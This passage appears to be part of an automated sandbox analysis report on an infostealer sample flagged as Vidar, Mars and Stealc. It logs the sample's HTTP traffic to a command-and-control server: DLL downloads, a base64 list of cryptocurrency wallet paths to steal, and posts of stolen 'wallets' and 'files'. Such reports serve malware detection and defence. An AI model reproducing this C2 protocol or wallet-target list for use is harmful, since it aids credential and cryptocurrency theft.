PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 147.45.78.252 Port 80</address></body></html>
Jul 1, 2024 13:02:10.238349915 CEST	371	OUT	POST /a17861b9cb6f1a53.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDB Host: 147.45.78.162 Content-Length: 171 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 69 63 72 6f 73 6f 66 74 5c 45 64 67 65 5c 55 73 65 72 20 44 61 74 61 5c 44 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 2d 2d 0d 0a Data Ascii: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="file"------GIEBFHCAKFBGDHIDHIDB--
Jul 1, 2024 13:02:10.440373898 CEST	461	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 11:02:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 266 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 37 38 2e 32 35 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 147.45.78.252 Port 80</address></body></html>
Jul 1, 2024 13:02:10.743176937 CEST	92	OUT	GET /d82daa352ff6e06f/freebl3.dll HTTP/1.1 Host: 147.45.78.162 Cache-Control: no-cache
Jul 1, 2024 13:02:10.943574905 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 11:02:10 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 17:49:08 GMT ETag: "a7550-5e7f1b24bcd00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Jul 1, 2024 13:02:11.489373922 CEST	92	OUT	GET /d82daa352ff6e06f/mozglue.dll HTTP/1.1 Host: 147.45.78.162 Cache-Control: no-cache
Jul 1, 2024 13:02:11.688983917 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 11:02:11 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 17:49:08 GMT ETag: "94750-5e7f1b24bcd00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Jul 1, 2024 13:02:12.343075037 CEST	93	OUT	GET /d82daa352ff6e06f/msvcp140.dll HTTP/1.1 Host: 147.45.78.162 Cache-Control: no-cache
Jul 1, 2024 13:02:12.543405056 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 11:02:12 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 17:49:08 GMT ETag: "6dde8-5e7f1b24bcd00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Jul 1, 2024 13:02:12.978710890 CEST	89	OUT	GET /d82daa352ff6e06f/nss3.dll HTTP/1.1 Host: 147.45.78.162 Cache-Control: no-cache
Jul 1, 2024 13:02:13.186976910 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 11:02:13 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 17:49:08 GMT ETag: "1f3950-5e7f1b24bcd00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Jul 1, 2024 13:02:15.073127031 CEST	93	OUT	GET /d82daa352ff6e06f/softokn3.dll HTTP/1.1 Host: 147.45.78.162 Cache-Control: no-cache
Jul 1, 2024 13:02:15.272599936 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 11:02:15 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 17:49:08 GMT ETag: "3ef50-5e7f1b24bcd00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Jul 1, 2024 13:02:15.536582947 CEST	97	OUT	GET /d82daa352ff6e06f/vcruntime140.dll HTTP/1.1 Host: 147.45.78.162 Cache-Control: no-cache
Jul 1, 2024 13:02:15.735970020 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 11:02:15 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 17:49:08 GMT ETag: "13bf0-5e7f1b24bcd00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Jul 1, 2024 13:02:16.395179033 CEST	201	OUT	POST /a17861b9cb6f1a53.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEGHJKJKKJDHIDHJKJDB Host: 147.45.78.162 Content-Length: 1261 Connection: Keep-Alive Cache-Control: no-cache
Jul 1, 2024 13:02:16.653110981 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 11:02:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jul 1, 2024 13:02:16.762809992 CEST	661	OUT	POST /a17861b9cb6f1a53.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIDGHIIECGHDHJKFCAEG Host: 147.45.78.162 Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 44 47 48 49 49 45 43 47 48 44 48 4a 4b 46 43 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 37 38 2e 32 35 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 [TRUNCATED] Data Ascii: ------FIDGHIIECGHDHJKFCAEGContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 147.45.78.252 Port 80</address></body></html>------FIDGHIIECGHDHJKFCAEGContent-Disposition: form-data; name="message"wallets------FIDGHIIECGHDHJKFCAEG--
Jul 1, 2024 13:02:16.969795942 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 11:02:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2408 Connection: keep-alive Vary: Accept-Encoding Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11 [TRUNCATED]
Jul 1, 2024 13:02:16.972817898 CEST	659	OUT	POST /a17861b9cb6f1a53.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHJDAKEGDBFHCAAKJJJD Host: 147.45.78.162 Content-Length: 459 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 37 38 2e 32 35 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 [TRUNCATED] Data Ascii: ------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 147.45.78.252 Port 80</address></body></html>------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="message"files------DHJDAKEGDBFHCAAKJJJD--
Jul 1, 2024 13:02:17.174745083 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 11:02:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jul 1, 2024 13:02:17.176162004 CEST	654	OUT	POST /a17861b9cb6f1a53.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAE Host: 147.45.78.162 Content-Length: 454 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 37 38 2e 32 35 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 [TRUNCATED] Data Ascii: ------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 147.45.78.252 Port 80</address></body></html>------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="message"------CFBFHIEBKJKFHIEBFBAE--
Jul 1, 2024 13:02:17.377650976 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 11:02:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Target ID:	0
Start time:	07:01:54
Start date:	01/07/2024
Path:	C:\Users\user\Desktop\jlO7971vUz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\jlO7971vUz.exe"
Imagebase:	0xb30000
File size:	15'461'583 bytes
MD5 hash:	4BFE7A656D28F578CA10ABA4C225FF41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2244401333.0000000001690000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.2244401333.0000000001690000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 